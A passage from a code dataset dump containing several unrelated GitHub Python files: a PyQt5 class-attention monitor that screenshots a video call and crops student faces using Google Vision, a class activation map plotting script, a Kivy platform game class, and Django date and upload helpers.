라벨\r\n classLabel = QLabel('Class Name : ', self)\r\n font1 = classLabel.font()\r\n font1.setPointSize(20)\r\n\r\n # 텍스트창\r\n qle = QLineEdit(self)\r\n qle.textChanged[str].connect(self.onChanged)\r\n\r\n # 라벨과 텍스트창 레이아웃\r\n hbox = QHBoxLayout()\r\n hbox.addStretch(1)\r\n hbox.addWidget(classLabel)\r\n hbox.addWidget(qle)\r\n\r\n # 레이아웃\r\n vbox = QVBoxLayout()\r\n vbox.addWidget(btn1)\r\n vbox.addWidget(lbl_img)\r\n vbox.addLayout(hbox)\r\n self.setLayout(vbox)\r\n\r\n # 제목 및 시작위치, 사이즈\r\n\r\n self.setWindowTitle('Group D Project')\r\n self.setGeometry(300, 300, 300, 200)\r\n\r\n # btn1이 눌리면 작동할 함수\r\n def button1Function(self):\r\n print(\"Start button Clicked\")\r\n self.hide()\r\n createFolder('./' + self.className + '/students')\r\n createFolder('./' + self.className + '/temp')\r\n processed_inputs = inputs_process(inputs)\r\n dlg = MyApp2(processed_inputs)\r\n dlg.exec_()\r\n\r\n # test입력창\r\n def onChanged(self, text):\r\n self.className = text\r\n\r\n\r\ndef inputs_process(inputs):\r\n average_score = inputs[0]\r\n scores = inputs[1]\r\n students_score = list()\r\n for name, score in scores.items():\r\n students_score.append((name, score))\r\n random.shuffle(students_score)\r\n students_score = students_score[:5]\r\n processed_inputs = (average_score, students_score)\r\n return processed_inputs\r\n\r\n\r\nclass MyApp2(QDialog):\r\n\r\n def __init__(self, processed_inputs):\r\n super().__init__()\r\n print(\"myapp2 init 들어옴\")\r\n self.show()\r\n self.inputs = processed_inputs\r\n self.i = 0\r\n self.initUI()\r\n self.dataPath = None\r\n self.dir_list = None\r\n self.time_class = list(range(len(class_stat)))\r\n\r\n def initUI(self):\r\n # 라벨 평균\r\n\r\n print(self.inputs)\r\n self.text0 = str(self.inputs[0])\r\n self.label0 = QLabel(self.text0, self)\r\n self.label0.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label0.font()\r\n font.setPointSize(50)\r\n self.label0.setFont(font)\r\n\r\n # 라벨 1\r\n self.text1 = str(self.inputs[1][0][0]) + ' ' + str(self.inputs[1][0][1])\r\n self.label1 = QLabel(self.text1, self)\r\n self.label1.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label1.font()\r\n font.setPointSize(20)\r\n self.label1.setFont(font)\r\n\r\n # 라벨 2\r\n self.text2 = str(self.inputs[1][1][0]) + ' ' + str(self.inputs[1][1][1])\r\n self.label2 = QLabel(self.text2, self)\r\n self.label2.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label2.font()\r\n font.setPointSize(20)\r\n self.label2.setFont(font)\r\n self.label2.setAlignment(Qt.AlignVCenter)\r\n\r\n # 라벨 3\r\n self.text3 = str(self.inputs[1][2][0]) + ' ' + str(self.inputs[1][2][1])\r\n self.label3 = QLabel(self.text3, self)\r\n self.label3.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label3.font()\r\n font.setPointSize(20)\r\n self.label3.setFont(font)\r\n\r\n # 라벨 4\r\n self.text4 = str(self.inputs[1][3][0]) + ' ' + str(self.inputs[1][3][1])\r\n self.label4 = QLabel(self.text4, self)\r\n self.label4.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label4.font()\r\n font.setPointSize(20)\r\n self.label4.setFont(font)\r\n\r\n # 라벨 5\r\n self.text5 = str(self.inputs[1][4][0]) + ' ' + str(self.inputs[1][4][1])\r\n self.label5 = QLabel(self.text5, self)\r\n self.label5.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label5.font()\r\n font.setPointSize(20)\r\n self.label5.setFont(font)\r\n\r\n # 종료 버튼\r\n quit_btn = QPushButton('Quit') # 버튼 생성(텍스트, 버튼이 위치할 부모 위젯)\r\n quit_btn.resize(quit_btn.sizeHint()) # 버튼 사이즈\r\n quit_btn.clicked.connect(self.quit_Function) # click시 함수 호출\r\n\r\n # 라벨 수직 배치\r\n self.layout = QVBoxLayout()\r\n self.layout.addWidget(self.label0)\r\n self.layout.addWidget(self.label1)\r\n self.layout.addWidget(self.label2)\r\n self.layout.addWidget(self.label3)\r\n self.layout.addWidget(self.label4)\r\n self.layout.addWidget(self.label5)\r\n self.layout.addWidget(quit_btn)\r\n self.setLayout(self.layout)\r\n\r\n # Timer 설정\r\n self.timer = QTimer(self)\r\n self.timer.start(2000) # 10.000초마다 반복(1000=1초)\r\n self.timer.timeout.connect(self.timeout_run) # 화면 갱신 함수\r\n\r\n # 스크린 기본 설정\r\n self.setWindowTitle('My First Application') # 제목\r\n self.setGeometry(1700, -10, 100, 2000) # 스크린 위치와 크기\r\n self.show() # 스크린 출력\r\n\r\n # 화면 갱신\r\n @pyqtSlot()\r\n def timeout_run(self):\r\n print(\"timeout 들어옴\")\r\n # 캡쳐하는 부분\r\n capture(ex.className)\r\n\r\n # 캡쳐된 사진을 모델에 돌리고 다시 삭제하는 부분\r\n dataPath = './' + ex.className + '/students' # dataset folder\r\n dir_list = os.listdir(dataPath)\r\n getInfo(dir_list, dataPath)\r\n\r\n # students_input은 {학생:예측결과} [capture의 반환결과]를 의미합니다. ex) {'kim':'a','nick', 'm', 'han':'d'}\r\n # student_score_update 는 students_input 결과를 보고 학생 점수표를 갱신시킵니다.\r\n student_score_update(students_input)\r\n\r\n # current_output()은 학생 점수표를 보고 (평균점수, {학생:점수})를 반환합니다.\r\n # inputs_process는 (평균점수, {학생:점수})를 입력받고, (평균점수, [학생, 점수] (5명 랜덤)) 형태로 변환합니다.\r\n # inputs를 갱신시킵니다\r\n self.inputs = inputs_process(current_output())\r\n\r\n self.text0 = str(self.inputs[0])\r\n self.label0.setText(self.text0)\r\n self.text1 = str(self.inputs[1][0][0]) + ' ' + str(self.inputs[1][0][1])\r\n self.label1.setText(self.text1)\r\n self.text2 = str(self.inputs[1][1][0]) + ' ' + str(self.inputs[1][1][1])\r\n self.label2.setText(self.text2)\r\n self.text3 = str(self.inputs[1][2][0]) + ' ' + str(self.inputs[1][2][1])\r\n self.label3.setText(self.text3)\r\n self.text4 = str(self.inputs[1][3][0]) + ' ' + str(self.inputs[1][3][1])\r\n self.label4.setText(self.text4)\r\n self.text5 = str(self.inputs[1][4][0]) + ' ' + str(self.inputs[1][4][1])\r\n self.label5.setText(self.text5)\r\n\r\n # 종료 버튼이 눌리면 작동할 함수\r\n def quit_Function(self):\r\n self.hide()\r\n self.timer.stop()\r\n print(\"Quit button Clicked\")\r\n dlg = stat_app()\r\n class_title = ex.className\r\n dlg.exec_()\r\n\r\n def change_inputs(self, changed_inputs):\r\n self.inputs = changed_inputs\r\n\r\n\r\nclass student:\r\n def __init__(self, name=\"\"):\r\n self.name = name # 이름\r\n self.score = 60 # 현재 점수\r\n self.reaction = 0 # 리액션 횟수\r\n self.score_list = list() # 점수 기록\r\n\r\n # 1분당 1점씩 점수 감소\r\n def auto_minus(self):\r\n self.score -= 1\r\n\r\n # 리액션할 경우 점수 증가\r\n def React(self):\r\n self.score += 5\r\n if self.score > 100:\r\n self.score = 100\r\n self.reaction += 1 # 리액션 횟수 증가\r\n self.score_list.append(self.score) # 점수 변화기록\r\n\r\n # 아무것도 안할 경우 점수만 기록\r\n def Nope(self):\r\n self.score_list.append(self.score) # 점수 변화기록\r\n\r\n # 프레임에 없을 경우 점수 감소\r\n def OutofFrame(self):\r\n self.score -= 5\r\n if self.score < 0:\r\n self.score = 0\r\n self.score_list.append(self.score) # 점수 변화기록\r\n\r\n\r\n# Main function: 입력값을 학생 객체에 갱신시킨다.\r\ndef student_score_update(students_input):\r\n for name, result in students_input.items():\r\n student_in = False # 매칭되는 학생 존재 여부\r\n # 만약 매칭되는 학생 개체가 있으면 갱신한다.\r\n for st in st_Obj_list:\r\n if name == st.name:\r\n student_in = True\r\n if result == 'clap' or result == 'nod' or result == 'smile':\r\n st.React()\r\n elif result == 'default':\r\n st.Nope()\r\n elif result == 'yawn' or result == 'outOfFrame':\r\n st.OutofFrame()\r\n\r\n # 매칭되는 학생 개체가 없으면 생성한다.\r\n if student_in == False:\r\n st_Obj = student(name)\r\n st_Obj_list.append(st_Obj)\r\n if result == 'smile' or result == 'nod' or result == 'clap':\r\n st_Obj.React()\r\n elif result == 'default':\r\n st_Obj.Nope()\r\n elif result == 'outOfFrame' or result == 'yawn':\r\n st_Obj.OutofFrame()\r\n\r\n\r\ndef current_output():\r\n total_score = 0\r\n # 현재 수업 평균 점수 계산 및 기록 및 출력\r\n average_score = 60\r\n for st in st_Obj_list:\r\n total_score += st.score\r\n average_score = total_score / len(st_Obj_list)\r\n # 수업 평균 점수를 기록한다\r\n average_score_list.append(average_score)\r\n\r\n # student_output: {학생: 현재 점수, 학생: 현재 점수, 학생: 현재 점수}\r\n student_output = dict()\r\n for st in st_Obj_list:\r\n student_output[st.name] = st.score\r\n # 최종 out: (수업평균점수, student_output)\r\n return (average_score, student_output)\r\n\r\n\r\ndef final_output():\r\n # final_student_output: {학생: 평균 점수, 학생: 평균 점수, 학생: 평균점수}\r\n final_student_output = dict()\r\n for st in st_Obj_list:\r\n final_student_score = sum(st.score_list) / len(st.score_list)\r\n final_student_output[st.name] = (final_student_score, st.reaction)\r\n # 수업 전체 평균 점수\r\n final_class_score = sum(average_score_list) / len(average_score_list)\r\n # 최종 out: (final_student_output, 전체 최종 수업 평균, 수업 평균 점수 배열)\r\n return (final_student_output, final_class_score, average_score_list)\r\n\r\n\r\nclass stat_app(QDialog):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.setVisible(True)\r\n self.student_stat = None\r\n self.class_stat = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n self.time_class = None\r\n self.initUI()\r\n\r\n def initUI(self):\r\n print(\"stat_app initUI로 들어옴\")\r\n grid = QGridLayout()\r\n self.setLayout(grid)\r\n\r\n x, y, z = final_output()\r\n self.get_info(x, y, z)\r\n\r\n # Graph drawing\r\n self.fig = plt.Figure()\r\n ax = self.fig.add_subplot(111)\r\n ax.set_title(ex.className + \"\\n\" + now + \"\\n\" + \"Class Attention Guage\")\r\n ax.set_xlabel('Time(divided by 10)')\r\n ax.set_ylabel('Guage')\r\n self.time_class = list(range(len(self.class_stat)))\r\n ax.plot(self.time_class, self.class_stat, label='Class Attention Guage')\r\n self.canvas = FigureCanvas(self.fig)\r\n\r\n # Student stat printing\r\n self.stat_tb = QTableWidget(self)\r\n self.stat_tb.setRowCount(len(self.student_stat))\r\n self.stat_tb.setColumnCount(3)\r\n self.set_stat_table()\r\n\r\n # Layout\r\n leftLayout = QVBoxLayout()\r\n leftLayout.addWidget(self.canvas)\r\n grid.addWidget(QLabel('Final Stat'), 0, 0)\r\n grid.addLayout(leftLayout, 1, 0)\r\n grid.addWidget(QLabel('Student Stat'), 0, 1)\r\n grid.addWidget(self.stat_tb, 1, 1)\r\n\r\n # Add export button\r\n btn = QPushButton('Export', self)\r\n grid.addWidget(btn, 2, 1)\r\n btn.resize(btn.sizeHint())\r\n btn.clicked.connect(self.export_clicked)\r\n\r\n self.setWindowTitle('Final Result Data')\r\n self.setWindowIcon(QIcon(\"Pictures/LAM로고.png\"))\r\n self.setGeometry(500, 400, 1015, 700)\r\n self.show()\r\n\r\n # setting up student table\r\n\r\n def set_stat_table(self):\r\n column_headers = ['name', 'score', 'reaction']\r\n row = 0\r\n print(\"set_stat_table 정보\")\r\n print(self.student_stat)\r\n self.stat_tb.setHorizontalHeaderLabels(column_headers)\r\n for key, value in self.student_stat.items():\r\n self.stat_tb.setItem(row, 0, QTableWidgetItem(key))\r\n self.stat_tb.setItem(row, 1, QTableWidgetItem(str(value[0])))\r\n self.stat_tb.setItem(row, 2, QTableWidgetItem(str(value[1])))\r\n row += 1\r\n\r\n # if export button is clicked,\r\n # student stat .csv // class graph .jpg\r\n # are exported\r\n\r\n def get_info(self, st_stat, class_score, c_stat):\r\n print(\"get_info 정보\")\r\n print(st_stat)\r\n print(class_score)\r\n print(c_stat)\r\n self.student_stat = st_stat\r\n self.class_stat = c_stat\r\n print(\"self 정보\")\r\n print(self.student_stat)\r\n print(self.class_stat)\r\n\r\n def export_clicked(self):\r\n print(\"Export 버튼의 정보\")\r\n print(self.class_stat)\r\n print(self.student_stat)\r\n f = open(ex.className + '_csv' + now + '_result.csv', 'w', encoding=\"UTF-8\")\r\n f.write('time' + ',' + 'avg' + '\\n')\r\n row = 0\r\n for value, row in zip(self.class_stat, range(len(self.class_stat))):\r\n f.write(str(row) + ',' + str(value) + '\\n')\r\n f.write('\\n')\r\n\r\n f.write('name' + ',' + 'score' + ',' + 'reaction' + '\\n')\r\n for key, value in self.student_stat.items():\r\n f.write(key + ',' + str(value[0]) + ',' + str(value[1]) + '\\n')\r\n f.close()\r\n self.fig.savefig(ex.className + '_jpg' + now + '_graph.jpg')\r\n\r\n\r\nclass person(object):\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n def __repr__(self):\r\n return \"'\" + self.name + \"'\"\r\n\r\n\r\ndef capture(classDir):\r\n img_full = ImageGrab.grab()\r\n width, height = img_full.size\r\n tempDir = classDir + '/temp/temp.png'\r\n img_full.crop((width / 18, height / 7, width * (14 / 18), height * (6 / 7))).save(tempDir, \"PNG\")\r\n faceCrop(tempDir, classDir)\r\n\r\n\r\ndef faceCrop(tempDir, classDir):\r\n # print(\"tempDir :\"+tempDir)\r\n # print(\"classDir :\"+classDir)\r\n\r\n tempImg = cv2.imread(tempDir)\r\n height, width, channel = tempImg.shape\r\n\r\n with io.open(tempDir, 'rb') as image_file:\r\n content = image_file.read()\r\n image = types.Image(content=content)\r\n client = vision.ImageAnnotatorClient()\r\n response = client.text_detection(image=image)\r\n texts = response.text_annotations\r\n\r\n print(len(texts))\r\n if len(texts) > 2 and len(texts) < 50:\r\n firstVertices = texts[1].bounding_poly.vertices\r\n f_cornerX = firstVertices[3].x\r\n secondVertices = texts[2].bounding_poly.vertices\r\n s_cornerX = secondVertices[3].x\r\n\r\n dx = s_cornerX - (f_cornerX + firstVertices[2].x)\r\n dy = int(dx * 0.6)\r\n\r\n if not os.path.isdir(classDir + \"/students\"):\r\n os.mkdir(classDir + \"/students\")\r\n print(classDir + \"/students\" + \"폴더 만들어짐\")\r\n print(\"if문 안걸림\")\r\n # print(texts[1:])\r\n # COUNT = 0\r\n for text in texts[1:]:\r\n print(\"facecrop for문 안으로 들어옴\")\r\n # cv2.rectangle(img=tempImg, pt1=(text.bounding_poly.vertices[0].x,text.bounding_poly.vertices[0].y), pt2=(text.bounding_poly.vertices[2].x,text.bounding_poly.vertices[2].y),color=(255,0,0))\r\n print(text.description)\r\n print(\"In\")\r\n path = classDir + \"/students/\"\r\n vertex = text.bounding_poly.vertices[3]\r\n leftTopY = vertex.y - dy - 5\r\n rightBotX = vertex.x + dx + 5\r\n if leftTopY < 0:\r\n leftTopY = 0\r\n if rightBotX > width:\r\n rightBotX = width\r\n face = tempImg[leftTopY: vertex.y, vertex.x: rightBotX]\r\n if rightBotX - vertex.x > width / 7 and vertex.y - leftTopY > height / 7:\r\n print(text.description)\r\n # print(leftTopY, vertex.y, vertex.x, rightBotX)\r\n cv2.imwrite(path + text.description + '.png', face)\r\n print(text.description + \"작성 중..\")\r\n # cv2.putText(tempImg, str(COUNT), (leftTopY, vertex.x), cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 0, 0))\r\n # cv2.rectangle(img=tempImg, pt1=(vertex.x, (leftTopY)), pt2=((rightBotX), vertex.y), color=(0, 255, 0))\r\n # COUNT += 1\r\n else:\r\n print(\"HI!\")\r\n\r\n # cv2.imshow(\"img\", tempImg)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n else:\r\n print(\"Error: too many\")\r\n\r\n\r\ndef createFolder(directory):\r\n try:\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n except OSError:\r\n print('Error: Creating directory. ' + directory)\r\n\r\n\r\nclassName = ''\r\ninputs = (\r\n50, {person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0})\r\nstatus = False\r\nstudent_stat = {' ': (0, 0), ' ': (0, 0), ' ': (0, 0), ' ': (0, 0)}\r\nclass_stat = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\nnow = datetime.now().strftime('%Y-%m-%d_%H%M')\r\n\r\napp = QApplication(sys.argv)\r\npath = Path()\r\nstudents_input = dict()\r\nst_Obj_list = list() # 학생 개체 모음\r\naverage_score_list = list() # 평균 점수 기록\r\nex = MyApp1()\r\nex.show()\r\nsys.exit(app.exec_())\r\n","repo_name":"CAUdLearning/LAM","sub_path":"LAM2.py","file_name":"LAM2.py","file_ext":"py","file_size_in_byte":19587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9333133223","text":"# simple implementation of CAM in PyTorch for the networks such as ResNet, DenseNet, SqueezeNet, Inception\n\nimport numpy as np\nimport cv2\nimport torch\nfrom torch.nn import functional as F\nfrom torch.nn import Upsample\nfrom model.net import get_network\nfrom model.config import config\nfrom UCR_DataLoader.UCR_Archive_Dataset import UCR_DataSet\nfrom UCR_DataLoader.UCR_Archive_Dataset import get_data\nfrom utils import argparser\nfrom torch.utils.data import DataLoader\nimport os\nfrom matplotlib import pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport UCR_DataLoader.time_series_augmentation.utils.augmentation as aug\n\n# hook the feature extractor\nfeatures_blobs = []\n\n\ndef plot_data_aug(x):\n aug_list = ['Jittering', 'Magnitude_Warping', 'Window_Wraping', 'Scaling']\n plt.rcParams[\"figure.figsize\"] = 5, 2.75\n x_trn = x.transpose(1, 2).cpu().numpy()\n x_train_max = np.max(x_trn)\n x_train_min = np.min(x_trn)\n x_train = 2. * (x_trn - x_train_min) / (x_train_max - x_train_min) - 1.\n for aug_type in aug_list:\n if aug_type == 'Jittering':\n x_aug = aug.jitter(x_train, sigma=0.02)\n elif aug_type == 'Scaling':\n x_aug = aug.scaling(x_train, sigma=0.1)\n elif aug_type == 'Magnitude_Warping':\n x_aug = aug.magnitude_warp(x_train, sigma=0.1, knot=4)\n else:\n x_aug = aug.window_warp(x_train, window_ratio=0.1, scales=[0.5, 2.])\n x_tmp = x_train.squeeze(0).squeeze(1)\n x_aug_tmp = np.transpose(x_aug, (0, 2, 1)).squeeze(\n 0).squeeze(0)\n t = range(len(x_tmp))\n\n plt.plot(t, x_tmp, 'b-', label='$X$')\n plt.plot(t, x_aug_tmp, 'r-', label='$\\^{X}$')\n plt.xlabel('Sequence')\n plt.ylabel('Normalized Value')\n plt.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(args.extra_tag,\n 'AUG_{}.pdf'.format(aug_type)))\n plt.clf()\n print('-> Plotting augmented X is done.')\n\n\ndef upsampler(input):\n upsampler = Upsample(scale_factor=2, mode='linear', align_corners=True)\n inp_tensor = torch.from_numpy(input).unsqueeze(0)\n output = upsampler(inp_tensor)\n output = output.squeeze(0).squeeze(0).data.cpu().numpy()\n return output\n\n\ndef plot(x, CAM, model):\n plt.rcParams[\"figure.figsize\"] = 5, 2.75\n\n fig = plt.figure(constrained_layout=True)\n spec2 = gridspec.GridSpec(ncols=1, nrows=7, figure=fig)\n\n ax1 = fig.add_subplot(spec2[0:6, 0])\n ax2 = fig.add_subplot(spec2[6:7, 0])\n\n x_tmp = x.squeeze(0).squeeze(0).squeeze(0)\n x_tmp = x_tmp - torch.min(x_tmp)\n x_tmp = x_tmp / torch.max(x_tmp)\n seq = range(len(x_tmp))\n extent = [seq[0]-(seq[1]-seq[0])/2., seq[-1]+(seq[1]-seq[0])/2., 0, 1]\n\n ax1.plot(seq, x_tmp)\n # ax1.set_title('{}'.format(model))\n ax1.set_yticks([])\n ax1.set_xlim(extent[0], extent[1])\n ax1.set_xlabel('Sequence')\n\n ax2.imshow(CAM[0][np.newaxis, :], cmap=\"jet\",\n aspect=\"auto\", extent=extent)\n ax2.set_yticks([])\n ax2.set_xlim(extent[0], extent[1])\n\n plt.tight_layout()\n plt.savefig(os.path.join(args.extra_tag, 'CAM_{}.pdf'.format(model)))\n plt.clf()\n\n\ndef hook_feature(module, input, output):\n features_blobs.append(input[0].data.cpu().numpy())\n\n\ndef returnCAM(feature_conv, weight_softmax, class_idx, size_upsample):\n # generate the class activation maps upsample to 256x256\n #size_upsample = (256, 256)\n bz, nc, h, w = feature_conv.shape\n output_cam = []\n for idx in class_idx:\n cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))\n cam = cam.reshape(h, w)\n cam = upsampler(cam)\n cam = cam - np.min(cam)\n cam_img = cam / np.max(cam)\n # cam_img = 2*(cam_img)-1\n #cam_img = np.uint8(255 * cam_img)\n output_cam.append(cam_img)\n return output_cam\n\n\ndef extend_4d(x, y):\n\n x = x.reshape(x.shape[1], x.shape[0])\n # This function is for making a 1D input time series to 4D.\n x = torch.unsqueeze(x, 0)\n return x, y\n\n\ndef main(args):\n\n global features_blobs\n\n finalconv_name = 'downsampler'\n\n transf = extend_4d if args.conv2d else None\n\n _, _, x_test, y_test, nb_class = get_data(args=args)\n\n val_dataset = UCR_DataSet(\n x=x_test, y=y_test, nb_class=nb_class, args=None, train=False, transform=transf)\n\n batch_size = val_dataset.x.shape[0]\n\n val_loader = DataLoader(\n val_dataset, batch_size=batch_size, shuffle=False, pin_memory=True)\n\n input_size = val_dataset.length\n predict_size = val_dataset.num_class\n\n # create model\n\n print(\"=> creating {} model.\".format(args.model_configuration))\n # Load model for training and inference\n net = get_network(args.model_configuration, input_size,\n prediction_size=predict_size, dropout=args.dropout, use_conv2d=args.conv2d)\n\n best_model = os.path.join(args.checkpoint, \"model_best.pth.tar\")\n source_state = torch.load(best_model)\n net.load_state_dict(source_state['state_dict'])\n\n net.cpu().eval()\n\n X, Y = next(iter(val_loader))\n\n plot_data_aug(X[0])\n\n net._modules.get(finalconv_name).register_forward_hook(hook_feature)\n\n # get the softmax weight\n params = list(net.parameters())\n\n for i in range(-3, -1):\n if i == -3:\n weight_softmax = torch.matmul(\n torch.transpose(params[i], 0, 1), torch.transpose(params[i+1], 0, 1)) # np.squeeze(.numpy())\n else:\n weight_softmax = torch.matmul(\n weight_softmax, torch.transpose(params[i+1], 0, 1)) # np.squeeze(.numpy())\n\n weight_softmax = torch.transpose(weight_softmax, 0, 1).data.cpu().numpy()\n\n for j in range(predict_size):\n true_positive = False\n temp_i = 0\n features_blobs = []\n while not true_positive:\n idx_class = np.argwhere(Y == j)\n if temp_i >= len(idx_class[0]):\n print('X> Class {} cannot be recognized at all.'.format(j))\n break\n x = torch.unsqueeze(X[idx_class[0][temp_i]], 0)\n logit = net(x)\n\n if predict_size > 2:\n h_x = F.softmax(logit, dim=1).data.squeeze()\n probs, idx = h_x.sort(0, True)\n probs = probs.numpy()\n idx = idx.numpy()\n\n true_positive = (idx[0] == j)\n tmp_id = idx[0]\n else:\n if j == 0:\n true_positive = True if (logit < 0.5) else False\n else:\n true_positive = True if (logit >= 0.5) else False\n tmp_id = 0\n\n if true_positive:\n print('!> Plotting CAM for class {}.'.format(j))\n # generate class activation mapping for the top1 prediction\n CAMs = returnCAM(features_blobs[0], weight_softmax,\n [tmp_id], size_upsample=(1, input_size))\n plot(x, CAMs, 'db_{}_cls_{}_config_{}'.format(\n args.dataset, j, config[args.model_configuration]['Paper_name']))\n else:\n temp_i += 1\n\n '''\n # render the CAM and output\n print('output CAM.jpg for the top1 prediction: %s' % idx[0])\n #img = cv2.imread('test.jpg')\n #height, width, _ = img.shape\n heatmap = cv2.applyColorMap(cv2.resize(\n CAMs[0], (1, input_size)), cv2.COLORMAP_JET)\n #result = heatmap * 0.3 + img * 0.5\n cv2.imwrite('CAM.jpg', heatmap)\n '''\n\n\nif __name__ == \"__main__\":\n args = argparser()\n main(args)\n","repo_name":"TeCSAR-UNCC/ATCN","sub_path":"CAM.py","file_name":"CAM.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"1218253380","text":"from kivy.animation import Animation\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color, Rectangle\nfrom kivy.properties import ListProperty\nfrom kivy.uix.widget import Widget\n\n\nclass Platform(Widget):\n velocity = ListProperty([0, 0])\n\n def __init__(self, player, isBooster, **kwargs):\n super(Platform, self).__init__(**kwargs)\n self.pos = kwargs['pos']\n self.size = kwargs['size']\n self.player = player\n self.isBooster = isBooster\n self.paused = False\n self.background_movement_speed = 20\n\n def update(self, *args):\n if self.paused:\n return\n\n self.platform_player_collision()\n if self.player.boost_active:\n self.boost_platform()\n else:\n self.move_platform()\n self.x += self.velocity[0]\n self.y += self.velocity[1]\n self.draw()\n\n def draw(self, *args):\n self.canvas.clear()\n with self.canvas:\n if not self.isBooster:\n Color(1., 1., 1.)\n else:\n Color(0., 1., 0.)\n Rectangle(pos=self.pos, size=(175, 15))\n\n def platform_player_collision(self):\n # check player collision with platforms\n if self.player.collide_widget(self):\n if self.player.velocity[1] < -5 and self.player.pos[1] > self.pos[1] - self.height / 2 \\\n and (2 > self.velocity[1] > -2):\n if self.isBooster:\n self.player.boost_active = True\n self.player.bounce_value = 25\n self.player.gravity /= 1.5\n self.player.velocity[1] = self.player.bounce_value\n\n def boost_platform(self):\n self.velocity[1] = self.player.platform_boost_velocity\n if self.velocity[1] < -40:\n self.player.boost_slowdown = True\n\n def move_platform(self):\n # update height of platforms\n if self.player.pos[1] >= 300 and not self.player.boost_active:\n # self.velocity[1] -= 2\n if self.player.velocity[1] > 0:\n if self.player.platform_velocity > -self.player.velocity[1]:\n self.player.platform_velocity -= 0.4\n\n else: # player is vertically decelerating\n if self.player.platform_velocity < 0:\n self.player.platform_velocity += 0.1\n self.velocity[1] = self.player.platform_velocity\n\n # if self.velocity[1] < self.background_movement_speed:\n # self.velocity[1] = -self.background_movement_speed\n else:\n # deceleration of platform when the player is not at the threshold until platform is stopped\n if self.velocity[1] < 0:\n self.velocity[1] += 1\n else:\n self.velocity[1] = 0","repo_name":"Filbert-code/GeoJump","sub_path":"Platform.py","file_name":"Platform.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"71146722020","text":"from django.core.exceptions import ValidationError\nfrom datetime import date, timedelta, datetime\n\nfrom random import randrange\nfrom django.utils.translation import get_language\nfrom webs.messages import MESSAGE_DICTIONARY\n\nimport os\nimport re\nfrom uuid import uuid4\n\nfrom PIL import Image\nimport copy\n\n\ndef merge_dicts(dict1, dict2):\n for k in set(dict1.keys()).union(dict2.keys()):\n if k in dict1 and k in dict2:\n if isinstance(dict1[k], dict) and isinstance(dict2[k], dict):\n yield (k, dict(merge_dicts(dict1[k], dict2[k])))\n else:\n yield (k, dict2[k])\n elif k in dict1:\n yield (k, dict1[k])\n else:\n yield (k, dict2[k])\n\n\ndef validate_image(fieldfile_obj):\n im = Image.open(fieldfile_obj.file)\n im.verify()\n\n width, height = im.size\n file_size = 1\n\n megabyte_limit = 2.0\n if file_size > megabyte_limit * 1024 * 1024:\n raise ValidationError(\"Max file size is %sMB\" % str(megabyte_limit))\n\n\ndef today():\n return date.today()\n\n\ndef day_add(time, number):\n try:\n return time + timedelta(days=number)\n except (ValueError, TypeError):\n return None\n\n\ndef day_sub(time, number):\n try:\n return time - timedelta(days=number)\n except (ValueError, TypeError):\n return None\n\n\ndef now():\n return datetime.now()\n\n\n# time is datetime\ndef time_slot(time, hour_from, hour_to):\n try:\n to_day = time.date().strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None, None\n\n time_slot_from = datetime.strptime(\n '{} {:02}:00:00'.format(to_day, hour_from), '%d/%m/%Y %H:%M:%S')\n time_slot_to = datetime.strptime(\n '{} {:02}:00:00'.format(to_day, hour_to), '%d/%m/%Y %H:%M:%S')\n\n return time_slot_from, time_slot_to\n\n\n# time is datetime\ndef time_slot_from_string(time, time_from, time_to):\n try:\n to_day = time.date().strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None, None\n\n time_slot_from = datetime.strptime(\n '{} {}'.format(to_day, time_from), '%d/%m/%Y %H:%M:%S')\n time_slot_to = datetime.strptime(\n '{} {}'.format(to_day, time_to), '%d/%m/%Y %H:%M:%S')\n\n return time_slot_from, time_slot_to\n\n\n# time is datetime\ndef time_from_string(time, time_string):\n try:\n to_day = time.date().strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None\n\n _time = datetime.strptime('{} {}'.format(\n to_day, time_string), '%d/%m/%Y %H:%M:%S')\n\n return _time\n\n\ndef start_a_day(_date):\n try:\n to_day = _date.strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None\n\n _time = datetime.strptime(\n '{} 00:00:00'.format(to_day), '%d/%m/%Y %H:%M:%S')\n\n return _time\n\n\ndef end_a_day(_date):\n try:\n to_day = _date.strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None\n\n _time = datetime.strptime(\n '{} 23:59:59'.format(to_day), '%d/%m/%Y %H:%M:%S')\n\n return _time\n\n\ndef last_day_of_month(any_day):\n next_month = any_day.replace(day=28) + timedelta(days=4)\n return next_month - timedelta(days=next_month.day)\n\n\nfrom django.utils.deconstruct import deconstructible\n\n\n@deconstructible\nclass PathAndRename(object):\n def __init__(self, sub_path):\n self.path = sub_path\n\n def __call__(self, instance, filename):\n upload_to = self.path\n ext = filename.split('.')[-1]\n # get filename\n if instance.pk:\n filename = '{}.{}'.format(instance.pk, ext)\n else:\n # set filename as random string\n filename = '{}.{}'.format(uuid4().hex, ext)\n # return the whole path to the 